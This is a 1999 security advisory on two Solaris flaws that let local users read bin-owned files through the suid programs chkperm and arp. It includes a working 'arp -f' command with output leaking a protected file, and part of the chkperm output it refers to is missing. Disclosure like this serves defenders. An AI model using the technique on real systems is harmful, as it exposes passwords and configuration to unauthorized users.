Solaris 'chkperm' & 'arp' security vulnerabilities
3 Dec. 1999
Summary
'/usr/vmsys/bin/chkperm' and '/usr/sbin/arp' can be used to read bin-owned files. This enables attackers to read files which they would usually don't have read access to, allowing the user to gain additional information about the system (passwords, hosts configuration and etc.)
Credit:
The information has been provided by: Brock Tellier.
Vulnerable systems:
Sun Solaris 5.6
Sun Solaris 5.5.1
Sun Solaris 2.7
Sun Solaris 2.6
Vulnerability #1 - chkperm
This one isn't nearly as interesting as the instant-shell exploit variety, but it gives an attacker an opening. Here's how it works:
chkperm is suid/sgid bin as shown:
bash-2.02$ ls -la /usr/vmsys/bin/chkperm
-rwsr-sr-x 1 bin bin 10080 Sep 1 1998 /usr/vmsys/bin/chkperm
'/etc/bin' is a bin/bin owned file mode 660 (thus shouldn't be readable by normal users) as shown:
bash-2.02$ ls -la /etc/bin
-rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin
As you can see, it cuts off the last line of five total for some reason. The meat of this exploit is the fact that chkperm allows you to supply the directory it will write known file names with VMSYS.
This exploit is sort-of a variation on the old chkperm exploit which allowed .facerc to be linked to '/usr/bin/.rhosts'. That particular problem was fixed, but this one was left behind.
Vulnerability #2 - arp
Just as the first, you may read any bin owned files:
bash-2.02$ ls -la /etc/bin
-rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin
bash-2.02$ cat /etc/bin
cat: cannot open /etc/bin
bash-2.02$ /usr/sbin/arp -f /etc/bin
arp: bad line: seekret1
arp: bad line: seekret2
arp: bad line: seekret3
arp: bad line: seekret4
arp: bad line: seekret5
